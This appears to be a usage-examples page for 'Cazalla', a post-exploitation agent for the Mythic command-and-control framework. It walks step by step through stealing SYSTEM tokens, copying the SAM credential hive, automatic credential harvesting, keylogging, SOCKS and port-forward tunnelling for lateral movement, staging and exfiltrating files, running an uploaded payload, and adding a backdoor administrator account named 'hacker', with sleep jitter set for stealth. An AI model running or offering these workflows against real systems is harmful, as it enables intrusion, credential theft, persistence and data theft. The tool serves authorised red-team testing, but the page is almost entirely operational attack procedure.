12 KiB
12 KiB
+++ title = "Examples" chapter = false weight = 10 pre = "5. " +++
Cazalla Usage Examples
This document provides practical examples and use cases for using Cazalla agent in real-world scenarios.
📋 Table of Contents
- Basic Operations
- File System Operations
- Process Management
- Token Operations
- Network Tunneling
- Credential Harvesting
- Common Workflows
Basic Operations
Initial Reconnaissance
After deploying the agent, start with basic reconnaissance:
# Check current user context
whoami
# List current directory
pwd
# List files in current directory
ls
# List running processes
ps
# Check current directory contents
ls C:\Users
Navigate File System
# Change to user directory
cd C:\Users\Administrator
# List files
ls
# Check current directory
pwd
# Change to Desktop
cd Desktop
# List Desktop contents
ls
File System Operations
Reading Files
# Read a text file
cat C:\Users\Administrator\Desktop\notes.txt
# Read configuration file (may detect credentials)
cat C:\Windows\System32\config\sam
# Read hosts file
cat C:\Windows\System32\drivers\etc\hosts
# Read file with relative path (from current directory)
cd C:\Users\Administrator\Desktop
cat notes.txt
Downloading Files
# Download a small file
download C:\Users\Administrator\Desktop\important.txt
# Download a large file (chunked automatically)
download C:\Windows\System32\config\sam
# Download with relative path
cd C:\Users\Administrator\Desktop
download important.txt
Uploading Files
# Upload a file (requires file_id from Mythic)
# 1. Upload file to Mythic UI first
# 2. Get file_id from Files page
# 3. Execute upload command
upload <file_id> C:\Users\Administrator\Desktop\payload.exe
# Upload to directory (filename auto-appended)
upload <file_id> C:\Users\Administrator\Desktop
# Upload to staging directory
mkdir C:\temp\staging
upload <file_id> C:\temp\staging
File Management
# Copy a file
cp C:\Users\Administrator\Desktop\file.txt C:\temp\backup.txt
# Create directory
mkdir C:\temp\new_folder
# Delete file
rm C:\temp\old_file.txt
# Delete directory
rm C:\temp\old_folder
Process Management
Process Enumeration
# List all processes
ps
# View processes in Process Browser UI
# Navigate to PROCESSES tab in Mythic UI
Process Termination
# Kill a process by PID
kill 1234
# Kill from Process Browser UI
# Right-click process → Kill Process
Process Investigation
# List processes to find target
ps
# Identify process by name (look for explorer.exe, chrome.exe, etc.)
# Note the PID
# Kill the process
kill <PID>
Token Operations
Token Enumeration
# List all available tokens
list_tokens
# Look for high-value tokens (SYSTEM, Domain Admins, etc.)
# Note the PID of the process
Token Theft
# Steal token from a process
steal_token 1060
# Verify impersonation
whoami
# Output: NT AUTHORITY\SYSTEM
# Execute commands with stolen token
# (Commands will run with token's privileges if selected in Mythic UI)
Token Creation
# Create token with domain credentials
make_token DOMAIN username password
# Create token for local user
make_token "" Administrator P@ssw0rd123
# Verify token creation
whoami
# Output: DOMAIN\username
# Use token for tasking
# (Select token from dropdown in Mythic UI before issuing commands)
Token Reversion
# After completing privileged operations
rev2self
# Verify reversion
whoami
# Output: Original user context
Complete Token Workflow
# 1. Check current context
whoami
# Output: DESKTOP-ABC\localuser
# 2. List available tokens
list_tokens
# Find SYSTEM token (PID 1060)
# 3. Steal token
steal_token 1060
# 4. Verify impersonation
whoami
# Output: NT AUTHORITY\SYSTEM
# 5. Execute privileged operations
# (Commands run with SYSTEM privileges)
# 6. Revert to original token
rev2self
# 7. Verify reversion
whoami
# Output: DESKTOP-ABC\localuser
Network Tunneling
SOCKS Proxy Example
# Start SOCKS proxy
socks {"action":"start","port":7002}
# Configure proxychains on your machine
# Edit /etc/proxychains.conf:
[ProxyList]
socks5 <mythic_server_ip> 7002
# Use proxychains with tools
proxychains curl https://internal-server.local
proxychains nmap -sT 192.168.1.0/24
proxychains wget https://internal-server.local/file.txt
# Stop SOCKS proxy
socks {"action":"stop","port":7002}
Reverse Port Forwarding Example
# Start reverse port forward
# Agent listens on 8080, forwards to 192.168.1.100:80
rpfwd {"action":"start","port":8080,"remote_host":"192.168.1.100","remote_port":80}
# Connect to agent:8080 (from another machine)
curl http://<agent_ip>:8080
# Connection is forwarded to 192.168.1.100:80
# Stop reverse port forward
rpfwd {"action":"stop","port":8080}
Database Access via RPFWD
# Tunnel database connections
rpfwd {"action":"start","port":3306,"remote_host":"10.0.0.50","remote_port":3306}
# Connect to MySQL through agent (from another machine)
mysql -h <agent_ip> -P 3306 -u user -p
Credential Harvesting
Automatic Credential Detection
The cat command automatically detects and reports credentials:
# Read a file that may contain credentials
cat C:\Users\Administrator\Desktop\config.txt
# If credentials are found, they are automatically:
# - Detected in file content
# - Reported to Mythic's credential store
# - Visible in CREDENTIALS tab
# Example file content that triggers detection:
# username:password
# domain\username:password
# username@domain.com:password
# password=secret123
# http://user:pass@host.com
# aad3b435b51404ee:hash...
Credential Extraction Workflow
# 1. Find configuration files
cd C:\Users\Administrator
ls
# 2. Read configuration files
cat .config
cat credentials.txt
cat config.ini
# 3. Check Credentials tab in Mythic UI
# All discovered credentials appear automatically
# 4. Use credentials for token creation
make_token DOMAIN username password
Common Workflows
Initial System Reconnaissance
# 1. Check current context
whoami
pwd
# 2. List processes
ps
# 3. Navigate user directory
cd C:\Users
ls
# 4. Check Desktop for interesting files
cd Administrator\Desktop
ls
# 5. Read interesting files
cat notes.txt
cat config.txt
Privilege Escalation Workflow
# 1. List available tokens
list_tokens
# 2. Identify high-value token (SYSTEM, Domain Admin, etc.)
# Note the PID
# 3. Steal token
steal_token <PID>
# 4. Verify impersonation
whoami
# 5. Execute privileged operations
# (Commands run with stolen token's privileges)
# 6. Revert to original token
rev2self
Data Exfiltration Workflow
# 1. Navigate to target directory
cd C:\Users\Administrator\Documents
# 2. List files
ls
# 3. Download important files
download important_document.pdf
download database_backup.sql
# 4. Create staging directory
mkdir C:\temp\exfil
# 5. Copy files to staging
cp important_document.pdf C:\temp\exfil
cp database_backup.sql C:\temp\exfil
# 6. Download from staging
cd C:\temp\exfil
download important_document.pdf
download database_backup.sql
# 7. Clean up staging
cd C:\temp
rm exfil
Lateral Movement via SOCKS
# 1. Start SOCKS proxy
socks {"action":"start","port":7002}
# 2. Configure proxychains on your machine
# Edit /etc/proxychains.conf:
[ProxyList]
socks5 <mythic_server_ip> 7002
# 3. Use proxychains for lateral movement
proxychains smbclient //internal-server.local/share -U user
proxychains rdesktop internal-server.local
proxychains ssh user@internal-server.local
File Upload and Execution
# 1. Upload payload to staging directory
mkdir C:\temp\staging
upload <file_id> C:\temp\staging\payload.exe
# 2. Verify upload
ls C:\temp\staging
# 3. Execute payload (if needed)
shell C:\temp\staging\payload.exe
# 4. Clean up
rm C:\temp\staging\payload.exe
Screenshot Capture
# Capture screenshot
screenshot
# Screenshot is automatically uploaded to Mythic
# View in Files tab or Screenshot UI
Keylogging Session
# 1. Start keylogger
keylog_start
# WARNING: This has CRITICAL OPSEC RISK
# Always requires lead operator approval
# 2. Let keylogger run for desired duration
# Keystrokes are automatically captured and sent to Mythic
# 3. View keylogs in Mythic UI
# Navigate to KEYLOGS tab
# 4. Stop keylogger
keylog_stop
Complete Post-Exploitation Workflow
# 1. Initial reconnaissance
whoami
pwd
ps
ls
# 2. Navigate user directory
cd C:\Users\Administrator
ls Desktop
# 3. Read interesting files
cat Desktop\notes.txt
cat Desktop\config.txt
# 4. Download important files
download Desktop\important.pdf
# 5. Token enumeration
list_tokens
# 6. Steal high-value token
steal_token <PID>
# 7. Verify impersonation
whoami
# 8. Execute privileged operations
# (Commands run with stolen token's privileges)
# 9. Capture screenshot
screenshot
# 10. Revert token
rev2self
# 11. Adjust sleep for stealth
sleep {"seconds":60,"jitter":20}
Advanced Examples
Multi-Step Privilege Escalation
# 1. List tokens to find SYSTEM process
list_tokens
# 2. Steal SYSTEM token
steal_token <SYSTEM_PID>
# 3. Verify SYSTEM context
whoami
# Output: NT AUTHORITY\SYSTEM
# 4. Access protected files
cat C:\Windows\System32\config\sam
download C:\Windows\System32\config\sam
# 5. Create new user with SYSTEM privileges
shell net user hacker P@ssw0rd123 /add
shell net localgroup administrators hacker /add
# 6. Revert to original token
rev2self
Network Pivoting via SOCKS
# 1. Start SOCKS proxy
socks {"action":"start","port":7002}
# 2. Configure proxychains
# Edit /etc/proxychains.conf:
[ProxyList]
socks5 <mythic_server_ip> 7002
# 3. Scan internal network
proxychains nmap -sT 192.168.1.0/24
# 4. Access internal services
proxychains curl http://192.168.1.100
proxychains smbclient //192.168.1.100/share -U user
# 5. Stop SOCKS proxy
socks {"action":"stop","port":7002}
Credential Extraction and Lateral Movement
# 1. Read configuration files
cat C:\Users\Administrator\Desktop\config.txt
# Credentials automatically detected and reported
# 2. Check Credentials tab in Mythic UI
# Find extracted credentials
# 3. Create token with extracted credentials
make_token DOMAIN username password
# 4. Verify token creation
whoami
# Output: DOMAIN\username
# 5. Use token for lateral movement
# (Commands run with domain credentials if token selected)
Tips and Best Practices
Use Built-in Commands
❌ Avoid:
shell whoami
shell tasklist
shell dir
✅ Prefer:
whoami
ps
ls
Use Relative Paths
# Change to target directory first
cd C:\Users\Administrator\Desktop
# Then use relative paths
ls
cat notes.txt
download important.pdf
Monitor Artifacts
After executing commands, always check the Artifacts tab in Mythic UI to see what forensic evidence was created.
Review OPSEC Warnings
Always read and understand OPSEC popup messages before approving commands.
Use Appropriate Sleep Intervals
# Initial deployment (stealth)
sleep {"seconds":60,"jitter":30}
# Interactive operations
sleep {"seconds":10,"jitter":10}
# Stealth mode
sleep {"seconds":120,"jitter":40}
Related Documentation
- Commands Reference - Detailed command documentation
- OPSEC Guide - Operational security considerations
- Features Overview - Feature explanations
- Getting Started - Installation and setup
Last Updated: 2024